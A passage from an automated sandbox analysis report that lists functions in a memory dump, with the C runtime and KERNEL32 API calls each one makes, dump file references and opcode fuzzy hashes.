                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?,?), ref: 6FDC8492
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?), ref: 6FDC8567
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@CurrentExceptionThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3517358164-0
                                                                                                          • Opcode ID: f79e3a1ead35a73532ced9cada60a396af8bde9ae683b4a4b809731a290d518f
                                                                                                          • Instruction ID: a1945f6ed3a6015a7d96e3114572e620c6c0ada4d5f87df338a49871f803b23f
                                                                                                          • Opcode Fuzzy Hash: f79e3a1ead35a73532ced9cada60a396af8bde9ae683b4a4b809731a290d518f
                                                                                                          • Instruction Fuzzy Hash: 1C41D171408385DFDF51DFA4C084A9DBBB9AF01318F0544AED5816B291C774FA89CBA2
                                                                                                          Function 6FD8FF48 Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _isctype_l.MSVCR100(7FFFFFFF,00000001,00000000,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E,7FFFFFFF,00000000), ref: 6FDAA2E4
                                                                                                          • _isleadbyte_l.MSVCR100(00000008,00000000,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E), ref: 6FDAA320
                                                                                                          • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,0000009E,7FFFFFFF,00000000,00000000,00000000,00000000,0000009E), ref: 6FDAA36D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String__crt_isctype_l_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 2483923138-0
                                                                                                          • Opcode ID: 49883ccd81b631e7c19e3c1bcade68feb6bd1771d5f5cf7e6ad969b360d9ebf6
                                                                                                          • Instruction ID: 5064d46c0797fb3001b8b1a0ae1a41af8f9ed0407285cc003327739bc4894d90
                                                                                                          • Opcode Fuzzy Hash: 49883ccd81b631e7c19e3c1bcade68feb6bd1771d5f5cf7e6ad969b360d9ebf6
                                                                                                          • Instruction Fuzzy Hash: B831D231A0434AEFDB41CBA8C885FEE7BB4AF02318F0482A9E5649B1C1D775F645CB61
                                                                                                          Function 6FDDCD1A Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _isctype_l.MSVCR100(?,00000002,?), ref: 6FDDCD4C
                                                                                                          • _isleadbyte_l.MSVCR100(00000008,?), ref: 6FDDCDAD
                                                                                                          • _errno.MSVCR100 ref: 6FDDCDCA
                                                                                                          • __crtLCMapStringA.MSVCR100(?,?,00000200,?,00000001,?,00000003,?,00000001), ref: 6FDDCDFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String__crt_errno_isctype_l_isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 1571695510-0
                                                                                                          • Opcode ID: 1793028658244fd72a6bce6e3986cbe0f74150968bb9edd81371ed4b330be9f7
                                                                                                          • Instruction ID: 7a0c09babf54ad56f05c1746779f7b988abcb1a88203996ce0b3db6ea25e1c32
                                                                                                          • Opcode Fuzzy Hash: 1793028658244fd72a6bce6e3986cbe0f74150968bb9edd81371ed4b330be9f7
                                                                                                          • Instruction Fuzzy Hash: 4B319071A04349EFDB418BA4C885FEE7FB4AB01308F144199F564AB1D1DB31E646CB60
                                                                                                          Function 6FDB6508 Relevance: 6.1, APIs: 4, Instructions: 91sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB652C
                                                                                                            • Part of subcall function 6FDB6E52: ?_SetSpinCount@?$_SpinWait@$0A@@details@Concurrency@@QAEXI@Z.MSVCR100(00000FA0,00000FA0,?,6FDBAB8A,00000000), ref: 6FDB6E6C
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB6572
                                                                                                          • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100(6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB,?), ref: 6FDB65C2
                                                                                                          • Sleep.KERNEL32(00000001,6FDB6670,0000002C,6FDB69E3,00000000,-00000004,-00000004,00000000,00000000,?,6FDBF7B0,?,00000000,?,?,6FDB9ADB), ref: 6FDB65E2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@Spin$A@@details@AcquireLock@details@ReaderWait@$0Write@_Writer$Count@?$_Once@?$_Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3783128884-0
                                                                                                          • Opcode ID: 7e455d9a44080fa44ca2374063f6b4421595f83654f5640b93db32971072cd79
                                                                                                          • Instruction ID: 6568b136b7500118b614c7e6829a6a37defdac995c688e06a32bd2b6705e6737
                                                                                                          • Opcode Fuzzy Hash: 7e455d9a44080fa44ca2374063f6b4421595f83654f5640b93db32971072cd79
                                                                                                          • Instruction Fuzzy Hash: 344141B1A08748CFEB91CFA8C54479EBBF0AF06318F04419DD592AB285D775F914CBA0
                                                                                                          Function 6FDE05B5 Relevance: 6.1, APIs: 4, Instructions: 89stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE05DD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE05E8
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy.MSVCR100(?,?,?,?,?), ref: 6FDE0614
                                                                                                          • memset.MSVCR100(?,00000000,?,?,?), ref: 6FDE065A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfomemsetstrncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3764360596-0
                                                                                                          • Opcode ID: 2116b637e9d6e4ece4b6867c5ec06b698625b7f7860fa350bf1b33f6dcafda4f
                                                                                                          • Instruction ID: dc188bcc36059aa788320f77f2318ff274505b9087d3f7eb3e329c4c0404887f
                                                                                                          • Opcode Fuzzy Hash: 2116b637e9d6e4ece4b6867c5ec06b698625b7f7860fa350bf1b33f6dcafda4f
                                                                                                          • Instruction Fuzzy Hash: B7219B71904386EFCB51CF6884946AD3B70DF82398B1492AED4E00F086DF31B986C771
                                                                                                          Function 6FDC6403 Relevance: 6.1, APIs: 4, Instructions: 88synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 6FDC641F
                                                                                                          • WaitForSingleObject.KERNEL32(?,?), ref: 6FDC6443
                                                                                                          • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6FDC6478
                                                                                                          • CloseHandle.KERNEL32(?), ref: 6FDC6524
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AcquireCloseConcurrency@@CountHandleLock@details@ObjectReaderSingleTickWaitWrite@_Writer
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188056818-0
                                                                                                          • Opcode ID: 53d8baa9a70ee8615ecefa2ccd50d14d1339d87030cf59fc3fed4883a89c8808
                                                                                                          • Instruction ID: 2cbbabf4e6940d1de2b46bde8caf6bcd0d9ab486aa83d4eca61bd39dab91dd16
                                                                                                          • Opcode Fuzzy Hash: 53d8baa9a70ee8615ecefa2ccd50d14d1339d87030cf59fc3fed4883a89c8808
                                                                                                          • Instruction Fuzzy Hash: 46316D71A083168BDB80CF68C9443ADBBA9BF45314F244679D859EF281CB75B941CBA2
                                                                                                          Function 6FDE08DD Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strnset.MSVCR100(?,?,?,?), ref: 6FDE0909
                                                                                                          • _errno.MSVCR100(?,?), ref: 6FDE0932
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?), ref: 6FDE093D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_strnset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2423426979-0
                                                                                                          • Opcode ID: 117fa332dbbb979fd47824fea29792cde5c52f522bd9c41f6353ba1d7e79ee64
                                                                                                          • Instruction ID: d81403170691773a93e7c86f5ac79f6d5117f13644ce5923b0f5227138d4e2fb
                                                                                                          • Opcode Fuzzy Hash: 117fa332dbbb979fd47824fea29792cde5c52f522bd9c41f6353ba1d7e79ee64
                                                                                                          • Instruction Fuzzy Hash: 0E314832904386EFEB51CF68CC885DD7BB0AF42298B1C625AD4E41F281DF32B485C7A1
                                                                                                          Function 6FD84C64 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2959964966-0
                                                                                                          • Opcode ID: 7c9b0ed7c493f3349ca2def0bf8fbd7b1ae41ecdd9efd907c1c8521a4820b386
                                                                                                          • Instruction ID: 676c7ab03b0c786f25a9b391b2fc4c31bfa923be320ce04bee3853d190b03ff1
                                                                                                          • Opcode Fuzzy Hash: 7c9b0ed7c493f3349ca2def0bf8fbd7b1ae41ecdd9efd907c1c8521a4820b386
                                                                                                          • Instruction Fuzzy Hash: F921B5B5A01325DBDB949F25C8006BA33B8FF52B54B15415BE8B19F384E736F981D3A0
                                                                                                          Function 6FD96D81 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000001,00000000,00000001,00000002,?,?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DEE
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DF8
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96DFF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FD96E06
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?,?,?,?,6FD8A795,?,6FD8A7B0,00000010), ref: 6FD8A6C5
                                                                                                            • Part of subcall function 6FD8A6BA: _get_osfhandle.MSVCR100(?), ref: 6FD8A6E8
                                                                                                            • Part of subcall function 6FD8A6BA: CloseHandle.KERNEL32(00000000), ref: 6FD8A6EF
                                                                                                          • _errno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB0531
                                                                                                          • __doserrno.MSVCR100(?,00000000,?,?,?,6FD96D4C,?,?,6FD96D68,00000010), ref: 6FDB053C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$CurrentHandleProcess$CloseDuplicate__doserrno_errno
                                                                                                          • String ID:
                                                                                                          • API String ID: 4219055303-0
                                                                                                          • Opcode ID: d2b8b12cc5f1498c35b40caab373939e0367a1e26c7e2a2debb638bca5468392
                                                                                                          • Instruction ID: e0f3a68e28d9cb209bba873ccbf0c9a2413049253844228fe7c7ce2386bfdc12
                                                                                                          • Opcode Fuzzy Hash: d2b8b12cc5f1498c35b40caab373939e0367a1e26c7e2a2debb638bca5468392
                                                                                                          • Instruction Fuzzy Hash: F331F236208785AFDB02CF68C884E953BF5EF0A308B15419AE9558F6A2DB71FA05CB50
                                                                                                          Function 6FD90DBF Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _towlower_l.MSVCR100(?,?,?), ref: 6FD90E07
                                                                                                            • Part of subcall function 6FD8254C: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6FD82590
                                                                                                          • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6FD90E17
                                                                                                          • _errno.MSVCR100 ref: 6FDAC6C3
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAC6CE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                                                                                          • String ID:
                                                                                                          • API String ID: 2204055994-0
                                                                                                          • Opcode ID: c62b32d6ea28998e8d4cd499b6f4a9f5f98c2951b40b5d7c84900ea7f25c408a
                                                                                                          • Instruction ID: a4ba5380fff369bfa2d35b60419c70cfb4e78fec03dd81091c5d8d7d94eed0a5
                                                                                                          • Opcode Fuzzy Hash: c62b32d6ea28998e8d4cd499b6f4a9f5f98c2951b40b5d7c84900ea7f25c408a
                                                                                                          • Instruction Fuzzy Hash: E2212476900355C7DBA18FB9D884BFA37A8AB00665B142517E8B09B190E736F980C774
                                                                                                          Function 6FDE0E55 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE0E7B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE0E86
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strncpy.MSVCR100(?,?,?,?), ref: 6FDE0EB4
                                                                                                          • memset.MSVCR100(?,00000000,00000000,?,?), ref: 6FDE0EFE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_invalid_parameter_noinfomemsetstrncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3764360596-0
                                                                                                          • Opcode ID: e03932b72af2d6447ce56332277166596a72c991e689b6cf4753ab6c114d1daa
                                                                                                          • Instruction ID: fa43c4b3ef3e248aef1a83bcf63827e63a68ddc5cf1f98847a05ea8097fa9034
                                                                                                          • Opcode Fuzzy Hash: e03932b72af2d6447ce56332277166596a72c991e689b6cf4753ab6c114d1daa
                                                                                                          • Instruction Fuzzy Hash: EC21957180838ADFCB51DF64C8445EE7B70AF01358B1457AAE4A11B182DB32F562D7A1
                                                                                                          Function 6FDBA630 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FDBA7F9: fabs.MSVCR100(00000000,00000000,00000000,00000000,?,6FDBA727,00000000,00000000,?,6FDBA51B), ref: 6FDBA831
                                                                                                          • sqrt.MSVCR100(?,?,?,?,?), ref: 6FDBA6AF
                                                                                                          • fabs.MSVCR100(?,?,?,?,?), ref: 6FDBA6BD
                                                                                                          • fabs.MSVCR100(?,?,?,?,?), ref: 6FDBA6DE
                                                                                                          • exp.MSVCR100(?,?,?,?,?), ref: 6FDBA6EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: fabs$sqrt
                                                                                                          • String ID:
                                                                                                          • API String ID: 372720774-0
                                                                                                          • Opcode ID: acc61d7fbe36568d809b8218ef31abdf18842dbe4a19ef56109a05f119476477
                                                                                                          • Instruction ID: d695ff2fd022af491072389c5e5b6e01fb38f09347a46e4eb80eaedabdc34723
                                                                                                          • Opcode Fuzzy Hash: acc61d7fbe36568d809b8218ef31abdf18842dbe4a19ef56109a05f119476477
                                                                                                          • Instruction Fuzzy Hash: 1121D7B1E04609E7CB046FA4E4844EDFF74FF44254F20859EE89562280DF35AE6097A4
                                                                                                          Function 6FDDAFE1 Relevance: 6.1, APIs: 4, Instructions: 79timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$LocalTime_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 250023431-0
                                                                                                          • Opcode ID: 082ac5e301b364801162ada63921b42230f857e46f52ee8a8b19f4132282b128
                                                                                                          • Instruction ID: 4f362e22e87b555ac10a9e162dfc01328ffe91473d75d1d49648702e34c56d32
                                                                                                          • Opcode Fuzzy Hash: 082ac5e301b364801162ada63921b42230f857e46f52ee8a8b19f4132282b128
                                                                                                          • Instruction Fuzzy Hash: 0E21DE36361704DAE7209FB9C80566AB3F1AF08718F14942FF869DB280E374E9459795
                                                                                                          Function 6FDF0CD8 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDF0D04
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDF0D0F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _tolower_l.MSVCR100(00000000,?,?), ref: 6FDF0D6A
                                                                                                          • _tolower_l.MSVCR100(00000000,?,00000000,?,?), ref: 6FDF0D7A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _tolower_l$_errno_invalid_parameter_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1430126910-0
                                                                                                          • Opcode ID: f569bddc1b1d507d9098431b0a9f0c33107118c0c6c20fe99890484bdd1115e5
                                                                                                          • Instruction ID: 63206cf6951cb1fc411b24cfccb1c5616d2ac14c1fa2f9f0d7b42d872bcc9474
                                                                                                          • Opcode Fuzzy Hash: f569bddc1b1d507d9098431b0a9f0c33107118c0c6c20fe99890484bdd1115e5
                                                                                                          • Instruction Fuzzy Hash: 62217171801349EBCF51DFA4CC48AAE77B4AF01399F211255E4306B5D0E770BA42CBA1
                                                                                                          Function 6FD91DBD Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FD91E07
                                                                                                          • _malloc_crt.MSVCR100(?,?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FD91E3E
